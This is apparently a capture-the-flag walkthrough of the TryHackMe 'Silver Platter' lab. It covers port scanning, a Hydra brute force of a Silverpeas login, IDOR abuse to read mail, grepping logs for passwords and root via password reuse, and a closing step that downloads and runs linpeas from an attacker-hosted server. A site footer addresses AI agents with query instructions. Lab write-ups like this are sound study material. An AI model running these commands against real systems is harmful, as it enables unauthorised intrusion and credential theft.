# Silver Platter

{% embed url="<https://tryhackme.com/room/silverplatter>" %}

## Enumeration

### nmap

{% code fullWidth="false" %}

```bash

$ nmap [Target IP] -v -T5 -A -p-

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:1c:87:8a:fe:34:16:c9:f7:82:37:2b:10:8f:8b:f1 (ECDSA)
|_  256 26:6d:17:ed:83:9e:4f:2d:f6:cd:53:17:c8:80:3d:09 (ED25519)

80/tcp   open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Hack Smarter Security
|_http-server-header: nginx/1.18.0 (Ubuntu)

8080/tcp open  http-proxy
|_http-title: Error
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Wed, 26 Feb 2025 12:45:08 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SMBProgNeg, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Wed, 26 Feb 2025 12:45:05 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Wed, 26 Feb 2025 12:45:06 GMT
|_    <html><head><title>Error</title></head><body>404 - Not Found</body></html>
```

{% endcode %}

### SSH 22

```bash
$ ssh root@silverplatter.thm
root@silverplatter.thm's password:
```

Let's check ssh first

* SSH use password based authentication

### HTTP 80

#### Directory Searching ([dirsearch](https://github.com/maurosoria/dirsearch))

```bash
Target: http://silverplatter.thm/

[21:36:52] Starting:                                                                                                
[21:38:18] 403 -  564B  - /assets/                                          
[21:38:18] 301 -  178B  - /assets  ->  http://silverplatter.thm/assets/
[21:39:09] 301 -  178B  - /images  ->  http://silverplatter.thm/images/     
[21:39:09] 403 -  564B  - /images/                                          
[21:39:20] 200 -   17KB - /LICENSE.txt                                      
[21:39:58] 200 -  771B  - /README.txt
```

We can take a look at the ***LICENSE.txt*** and ***README.txt***, and I can tell you that there's nothing really going on, so we can skip this for now.

### Web Feature

![info](/files/P18lic2Cgn0lLEl2TZbV)

* Here we get some crucial info. Software info: **Silverpeas**. Username: **scr1ptkiddy**

### HTTP 8080

<figure><img src="/files/OymvlK2I6of7aofMFUMl" alt=""><figcaption><p>Login page</p></figcaption></figure>

On port 8080 we can found a login page and we have the user name and now we have to find a way to possibly brute force in.

Fortunately, we can find some clues in the room's description: ***(they check it against the rockyou.txt wordlist - that's how 'cool' they are)***

#### CEWL (<https://www.kali.org/tools/cewl/>)

```bash
$ cewl [URL] > custom_passwords.txt
#drags all the words from the web
```

## Brute Forcing

### Hydra

* See more on: <https://www.kali.org/tools/hydra/> or use `man hydra`

{% code fullWidth="false" %}

```bash
$ hydra -l scr1ptkiddy -P ~/HTB-Labs/SilverPlatter/custompass.txt silverplatter.thm -s 8080 http-post-form "/silverpeas/AuthenticationServlet:Login=^USER^&Password=^PASS^&DomainId=0:Login or password incorrect" -V -t 4
#hydra -l [Username] -P [Password List] [Target Hostname] -s [Port] http-post-form "[Request URL Ending]:[Request-Body]:[Error Message for Invalid Login]"

RETURN:
[8080][http-post-form] host: silverplatter.thm   login: scr1ptkiddy   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
```

{% endcode %}

## Authentication Bypass

**CVE-2024-36042**: <https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d>

This is another way to get in, and this require using Burpsuite or Caido.

## IDOR

CVE-2023-47323: <https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47323>

<figure><img src="/files/w1XIQzONfj7KEVqBmiqq" alt="" width="563"><figcaption></figcaption></figure>

Use burpsuite to get the mail id (traffic) and it should look like this:

<figure><img src="/files/p3RJnSgKhHLTZCDLgXZD" alt="" width="563"><figcaption></figcaption></figure>

Noticed that we have an ID, and we can change it to other value. In this case we change the ID value to 5 and got the following message, which is an ssh password.

<figure><img src="/files/aAZzVkKIT3uBT7wLE2Mc" alt="" width="563"><figcaption></figcaption></figure>

## SSH login

```bash
$ ssh tim@silverplatter.thm
tim@silverplatter.thm's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-91-generic x86_64)
...
tim@silver-platter:~$
tim@silver-platter:~$ ls
user.txt                                                                                                
```

After logging in we got our first flag!

## Post-Exploitation

### sudo **Privileges (denied)**

```bash
tim@silver-platter:~$ sudo su
[sudo] password for tim: 
tim is not in the sudoers file.  This incident will be reported.
```

### Group - ADM

As we can see there's ***4(adm)*** at the very end, which is group and we might need that later.

```bash
tim@silver-platter:~$ id
uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)
```

### Users

```bash
tim@silver-platter:~$ cat /etc/passwd
~~
tyler:x:1000:1000:root:/home/tyler:/bin/bash
~~
```

We are looking for a user who have access to the `/home/` directory and we got **tyler**

```bash
tim@silver-platter:~$ cd ..
tim@silver-platter:/home$ ls -la
total 16
drwxr-xr-x  4 root  root  4096 Dec 13  2023 .
drwxr-xr-x 19 root  root  4096 Dec 12  2023 ..
dr-xr-xr-x  2 root  root  4096 Dec 13  2023 tim
drwxr-x---  5 tyler tyler 4096 Dec 13  2023 tyler
```

### /var/log look through

This is a way to find possible passwords but you can also try `cat /etc/shadow` but it will likely get denied

```bash
tim@silver-platter:/var/log$ grep -ir "password" 
#-i is for whatever case that matches the string 
#-ir in any directory to look for the string
```

We find the `DB_password` . Now we can use that to see if he reuse the password

```bash
tim@silver-platter:/home$ su tyler
Password: 
tyler@silver-platter:
tyler@silver-platter:~$ sudo su
[sudo] password for tyler: 

root@silver-platter:/home/tyler# cd ~
root@silver-platter:~# ls
root.txt  snap  start_docker_containers.sh
root@silver-platter:~# cat root.txt
THM{REDACTED}#
```

We’re in, and the password reuse is confirmed

### Linpeas

This is an alternative way to see what's vulnerable by using linpeas

<pre class="language-bash"><code class="lang-bash"><strong>HOST:
</strong><strong>wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
</strong><strong>
</strong><strong>python3 -m http.server 80
</strong>
TARGET:
wget http://[Attacker-IP]/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh
</code></pre>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://vix-w1zzer.gitbook.io/vixwizzer/walkthroughs/silver-platter.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.